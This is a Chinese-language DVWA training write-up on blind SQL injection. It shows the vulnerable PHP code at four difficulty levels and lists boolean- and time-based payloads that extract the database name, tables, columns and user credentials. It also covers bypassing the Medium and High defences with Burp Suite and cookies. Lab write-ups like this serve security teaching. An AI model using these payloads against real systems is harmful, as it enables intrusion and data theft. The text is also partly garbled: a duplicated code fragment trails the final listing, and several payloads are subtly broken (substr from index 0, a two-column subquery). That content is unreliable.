第八关:SQL Injection(Blind) 盲注
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。
Low
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
$exists = false;
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
?>
分析代码可得,参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种情况。
- 布尔盲注
1、判断注入的类型
输入1' and 1=1#, 1' and 1=2#进行判断
2、猜解当前数据库名
首先需要猜解数据库名的长度,然后挨个猜解字符
# 猜解数据库的长度
1' and length(database())=1 #
1' and length(database())=1 #
... 依次增大直到显示正确
# 使用二分法猜解数据库名的字符
1' and ascii(substr(database(),1,1))>97 #,显示存在,则表明字符的ASCII码大于97,在ASCII码 97 - 122 使用二分法继续进行判断
1' and ascii(substr(database(),1,1))>110 #
... 依次使用二分法直到查找到
3、猜解数据库中的表名
# 首先猜解数据库中表的数量
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 #,依次增加数字进行判断 '
# 猜解表名的长度
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1 #,依次增加数字进行判断 '
# 猜解表名的字符
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))>97 #,使用二分法进行判断
4、猜解表中的字段名
# 首先猜解表中字段的数量
1' and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 #,依次增加数字进行判断 '
# 猜解字段名的长度
1' and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),0,1))=1 ,依次增加数字进行判断 '
# 猜解表名的字符
1' and ascii(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),0,1))>97 #,使用二分法进行判断
5、猜解数据同样采用二分法进行判断,不够这种判断可以使用工具或者自己写代码进行猜解
- 时间盲注
1、判断是否存在注入点并确定类型
1' and sleep(5) #
1 and sleep(5) #
2、猜解数据库名
# 首先判断数据库名的长度
1' and if(length(database())=1,sleep(5),1) #
1' and if(length(database())=2,sleep(5),1) #
... 依次增加直到感觉有延迟
# if(a,b,c) 如果a满足条件,返回吧,否则返回c
# 猜解数据库名的字符
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1) #
1' and if(ascii(substr(database(),1,1))<100,sleep(5),1) #
... 依次增加直到感觉有延迟
3、猜解数据库的表名
# 猜解数据库中表的数量
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) # '
... 依次增加直到感觉有延迟
# 猜解表名的长度
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1,sleep(5),1) # '
...依次增加直到感觉有延迟
# 猜解表名的字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))>97,sleep(5),1) # '
...依次增加直到感觉有延迟
4、猜解表中的字段名
# 猜解字段的数量
1' and if((select count(column_name) from information_schema.columns where table_name= 'users')=1,sleep(5),1) # '
# 猜解字段的长度
1' and if(length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),0,1))=1,sleep(5),1) # '
# 猜解字段的字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),0,1))=97,sleep(5),1) # '
5、猜解数据,使用二分法增加效率
1' and if(ascii(substr((select username,password from users limit 0,1),0,1))=1,sleep(5),1) # '
Medium
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$exists = false;
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
?>
代码中使用了mysql_real_escape_string函数对特殊符号进行转义,页面中也使用下拉框来避免用户的输入,且使用POST进行数据提交
虽然使用了POST进行数据提交,但是可以使用burp suite抓包获取参数信息,利用google插件hackbar进行POST数据提交,后面的步骤与low中类似。
High
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
$exists = false;
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors
// Get results
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
?>
从源码中得到,sql查询语句做了limit限制,防止多条数据泄露,但可以使用#注释绕过;同时发现当sql查询为空或者出错时,代码将执行sleep函数,目的是为了扰乱基于时间的盲注,干扰我们的判断,因此不能使用基于时间的盲注,可以使用基于布尔的盲注。注入方法类似上面的步骤
Impossible
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
$exists = false;
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
$id = intval ($id);
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$exists = $data->rowCount();
break;
case SQLITE:
global $sqlite_db_connection;
$stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );
$stmt->bindValue(':id',$id,SQLITE3_INTEGER);
$result = $stmt->execute();
$result->finalize();
if ($result !== false) {
// There is no way to get the number of rows returned
// This checks the number of columns (not rows) just
// as a precaution, but it won't stop someone dumping
// multiple rows and viewing them one at a time.
$num_columns = $result->numColumns();
if ($num_columns == 1) {
$row = $result->fetchArray();
$numrows = $row[ 'numrows' ];
$exists = ($numrows == 1);
}
}
break;
}
}
// Get results
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
ID exists in the database.’;
} else {
// User wasn’t found, so the page wasn’t!
header( $_SERVER[ ‘SERVER_PROTOCOL’ ] . ’ 404 Not Found’ );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入